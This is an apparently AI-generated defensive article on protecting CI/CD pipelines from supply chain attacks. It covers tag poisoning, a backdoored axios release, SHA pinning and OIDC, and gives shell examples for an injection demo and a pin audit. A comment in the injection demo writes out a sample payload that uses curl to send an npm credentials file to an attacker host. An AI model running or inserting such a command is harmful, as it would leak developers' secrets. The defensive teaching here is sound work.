Hardening CI/CD Pipelines Against Zero-Day Supply Chain Attacks
These articles are AI-generated summaries. Please check the original sources for full details.
Two Supply Chain Attacks in Two Weeks - Why Defense-in-Depth Saved Me
Felix Ortiz experienced two distinct supply chain attacks within 14 days targeting his CI/CD infrastructure via tag poisoning and backdoored npm packages. In the axios compromise, a malicious postinstall script phoned home to a C&C server for six seconds before the runner completed its job.
Why This Matters
The technical reality of modern development is that transitive dependencies never appear in the project manifest, and global installs (‘npm install -g’) bypass both the manifest and the lockfile, creating a shadow attack surface that scans of package.json and package-lock.json never see. This incident underscores the failure of relying on registry trust: even though axios was not in the project’s package.json, a global install in a DAST security workflow pulled the backdoored release onto the runner. When an upstream maintainer account is compromised, nothing at the registry layer stops the malicious version; what contains the damage is defense-in-depth (pinned, verified references) combined with least-privilege, short-lived credentials that are worthless by the time they are exfiltrated.
Key Insights
- Tag poisoning of aquasecurity/trivy-action in March 2026 demonstrated that mutable version tags can be silently redirected to malicious commits.
- Backdoored axios versions 1.14.1 and 0.30.4 contained hidden postinstall scripts targeting CI/CD build infrastructure to exfiltrate secrets.
- The GITHUB_TOKEN issued to a job is short-lived: per GitHub’s documentation it is revoked when the job completes and expires after 24 hours at the latest, so a token captured by the postinstall script could only be abused for the few seconds the job was still running, which effectively limited the blast radius of the runner compromise.
- OIDC-based workload identity federation issues short-lived cloud credentials to a specific workflow run instead of storing long-lived keys in repository secrets, so an attacker who reads the repository and its workflow files, or captures what a compromised step can see, has nothing durable to pivot into the cloud environment with.
- Dependabot can be used to manage immutable SHA-pinned references, turning manual hardening into an automated security practice.
Working Examples
Replacing mutable version tags with immutable 40-character commit SHAs.
# Before - mutable tag
- uses: actions/checkout@v4
# After - immutable SHA
- uses: actions/checkout@de0fac2e... # v6
Preventing shell script injection by moving GitHub Actions expressions out of run: scripts and into env: blocks, so an untrusted value reaches the shell as a variable rather than as script text.
# Before - injection risk
run: |
  if [ -n "${{ steps.some-step.outputs.VALUE }}" ]; then
# After - safe
env:
  STEP_VALUE: ${{ steps.some-step.outputs.VALUE }}
run: |
  if [ -n "$STEP_VALUE" ]; then
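To make the difference between the two forms concrete, here is an added example (not code from the original article) that emulates with plain sh what the Actions runner does: the "before" function splices a constructed attacker-controlled value into the script text, exactly as ${{ ... }} substitution would, while the "after" function hands the same value to the shell through an environment variable. The function names, ATTACKER_VALUE and the INJECTED marker are this example's own.

```shell
#!/bin/sh
# Added example, not code from the original article. A `${{ ... }}`
# expression is substituted into the `run:` script *text* before the shell
# parses it, so a value an attacker controls (a PR title, the output of a
# backdoored action) becomes part of the program. The `env:` form delivers
# the same value as a variable, where the shell treats it as data.

# Constructed attacker-controlled value. A real payload would look like
#   "; curl -d @$HOME/.npmrc https://attacker.example; echo "
# This one only prints a marker so the effect is visible and harmless.
ATTACKER_VALUE='"; echo INJECTED; echo "'

# "Before": the value is spliced into the script source, as the runner does for
#   if [ -n "${{ steps.some-step.outputs.VALUE }}" ]; then ...
run_before() {
  script='if [ -n "'"$1"'" ]; then echo present; fi'
  # The spliced quote closes the string early; stderr hides the resulting
  # "[: missing ]" complaint, after which the injected commands still run.
  sh -c "$script" 2>/dev/null
}

# "After": the value reaches the script through the environment, so the
# shell never re-parses it as code. Mirrors the env:/STEP_VALUE pattern.
run_after() {
  STEP_VALUE="$1" sh -c 'if [ -n "$STEP_VALUE" ]; then echo present; fi'
}

# Runs the given variant with the attacker value and reports "yes" if the
# marker command executed, "no" otherwise.
injected() {
  out="$("$1" "$ATTACKER_VALUE" 2>/dev/null || true)"
  case "$out" in
    *INJECTED*) echo yes ;;
    *) echo no ;;
  esac
}

echo "before: $(injected run_before)"   # yes: attacker text ran as commands
echo "after:  $(injected run_after)"    # no: value stayed a string
```

The same reasoning applies to every other expression that carries untrusted input into a run: step (github.event.pull_request.title, github.head_ref, issue bodies); route all of them through env:.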
Pinning container images to immutable SHA256 digests to prevent tag-based attacks.
# Before
image: postgres:17
# After
image: postgres@sha256:b994732f... # 17
Practical Applications
- System: CI/CD Workflows. Behavior: Replace every ‘npm install -g <pkg>’ with an exact, pinned version (‘npm install -g <pkg>@x.y.z’) so a registry compromise cannot hand the runner a malicious latest release. Pitfall: An unpinned global install bypasses the lockfile entirely and leaves no trace in the project manifest, so manifest- and lockfile-based scanners never see it.
- System: Cloud Authentication. Behavior: Use OIDC federation instead of static secrets for cloud provider access. Pitfall: Long-lived cloud credentials stored in repository secrets are handed to every workflow step that references them, so a backdoored action or postinstall script can exfiltrate them and keep using them long after the job ends, even when the GITHUB_TOKEN itself was limited to ‘contents: read’.
- System: Dependency Management. Behavior: Run ‘npm audit signatures’ to verify registry signatures and flag packages whose provenance attestations are missing or fail verification. Pitfall: Ignoring package provenance increases the risk of installing unverified code published from a compromised maintainer account.
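As an added example that is not code from the original article, the following POSIX shell audit applies the pinning rules from the Working Examples and the global-install rule above to a workflow file: action references must end in a 40-hex commit SHA (or a sha256 digest for docker:// references), service images must carry an @sha256: digest, and ‘npm install -g’ must name an exact version. The sample workflow, the function names, and the SHA and digest values are constructed for the example; the placeholder SHAs are not real commits.

```shell
#!/bin/sh
# Added example, not code from the original article: audit a GitHub Actions
# workflow for references an attacker could redirect by moving a tag or
# republishing a package. It reports
#   - uses: refs whose ref is not a 40-hex commit SHA (or sha256 digest),
#   - image: values without an @sha256: digest,
#   - "npm install -g <pkg>" in run: scripts without an explicit version.
# The sample workflow below is constructed; its SHAs/digests are placeholders.

is_pinned_action() {
  printf '%s\n' "$1" | grep -Eq '@([0-9a-f]{40}|sha256:[0-9a-f]{64})$'
}

is_pinned_image() {
  printf '%s\n' "$1" | grep -Eq '@sha256:[0-9a-f]{64}$'
}

# "pkg@1.2.3" or "@scope/pkg@1.2.3" is pinned; "pkg" or "@scope/pkg" is not.
is_pinned_npm() {
  printf '%s\n' "$1" | grep -Eq '^@?[^@]+@[^@]+$'
}

# Prints one line per mutable reference found in workflow file $1.
find_unpinned() {
  file="$1"
  # uses: refs, with or without a leading "- "; trailing "# vX" comment dropped
  for ref in $(sed -En 's/^[[:space:]]*(-[[:space:]]+)?uses:[[:space:]]*([^[:space:]#]+).*/\2/p' "$file"); do
    case "$ref" in ./*) continue ;; esac   # local action: fixed by the checkout SHA
    is_pinned_action "$ref" || echo "unpinned action: $ref"
  done
  for img in $(sed -En 's/^[[:space:]]*image:[[:space:]]*([^[:space:]#]+).*/\1/p' "$file"); do
    is_pinned_image "$img" || echo "unpinned image: $img"
  done
  # package list after "npm install -g" / "npm i -g", cut at ; & or |
  sed -En 's/.*npm (install|i) -g[[:space:]]+([^;&|]*).*/\2/p' "$file" |
  while read -r pkgs; do
    for pkg in $pkgs; do
      case "$pkg" in -*) continue ;; esac   # skip flags such as --no-audit
      is_pinned_npm "$pkg" || echo "unpinned global install: $pkg"
    done
  done
}

unpinned_count() { find_unpinned "$1" | wc -l | tr -d ' '; }

# Prints findings and fails (exit 1) when anything is still mutable, so it
# can gate a CI job.
audit_pins() {
  findings="$(find_unpinned "$1")"
  if [ -n "$findings" ]; then
    printf '%s\n' "$findings"
    return 1
  fi
  echo "all references in $1 are pinned"
}

# Constructed sample: least-privilege token, OIDC enabled via id-token: write,
# and a mix of pinned and mutable references.
write_sample_workflow() {
  cat > "$1" <<'EOF'
name: ci
on: [push]
permissions:
  contents: read
  id-token: write   # only needed for OIDC federation to a cloud provider
jobs:
  test:
    runs-on: ubuntu-latest
    services:
      db:
        image: postgres:17
      cache:
        image: redis@sha256:0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@0123456789abcdef0123456789abcdef01234567 # v4 (placeholder SHA)
      - uses: aquasecurity/trivy-action@master
      - uses: ./.github/actions/local-lint
      - run: npm install -g axios
      - run: npm install -g prettier@3.2.5 --no-audit
      - run: npm ci
EOF
}

SAMPLE="$(mktemp)"
write_sample_workflow "$SAMPLE"
audit_pins "$SAMPLE" || echo "audit failed: $(unpinned_count "$SAMPLE") mutable reference(s)"
```

Against the sample this reports four findings: actions/checkout@v4, aquasecurity/trivy-action@master, postgres:17 and the bare axios install. To obtain real values for the fixes, ‘git ls-remote --tags https://github.com/actions/checkout v4’ prints the commit a tag currently points at (for annotated tags, take the ‘v4^{}’ line), and ‘docker buildx imagetools inspect postgres:17’ prints the image digest; Dependabot can then keep the SHA-pinned references current, as noted under Key Insights.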